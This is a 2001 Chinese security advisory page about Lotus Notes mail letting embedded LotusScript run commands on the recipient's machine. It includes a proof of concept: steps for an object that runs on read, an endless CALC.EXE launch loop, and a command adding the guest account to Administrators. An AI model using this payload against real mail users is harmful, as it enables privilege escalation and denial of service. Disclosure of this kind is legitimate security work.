xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Lotus Notes Mail 存在安全问题


发布时间:2001-10-23
更新时间:2001-10-23
严重程度:
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:客户机模式

受影响系统
Lotus Notes Client 5 All releases Lotus Notes Client 4.6 All releases
详细描述
在lotus notes MAIL中嵌入lotus脚本,你可能可以在接受者机器上执行任意命令。

测试代码
1)建立新的MAIL,加上接受者
2)点击菜单"Creadte..Object"
3)选择"control"和任意对象如"ActiveXPlugin Object"
4)在client 4.6中右击object获得"Properties"而在Client 5中点击菜单
"Applet"上,然后获得"Progperties",然后点击"run the object when the document is read"
5)然后选择"Edit events",事件对话框打开连接对象。
6)在"Initialize"段中增加如下代码,这里的"MY EMAIL"是你Lotus Notes帐户名字:

Sub Initialize
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                        Do
                            TaskId%=Shell("CALC.EXE",1)
                        Loop
                     End If
              End Subv
7)在"Terminate"段:

Sub Terminate
                     Dim TaskId As Integer
                     Dim session As New NotesSession
                     If session.CommonUserName<>"My EMAIL" Then
                         Do
                            TaskId%=Shell("CALC.EXE",1)
                         Loop
                     End If
              End Subv

8)再点击"Initialize"段。
9)发送。

在读文档的时候你的ActiveX就会执行,在Do..Loop中设置如下语句:

TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)

就会增加用户到管理员组。

解决方案
尚无

相关信息
Yann (irib@bunker.freexion.net)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0180.html
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved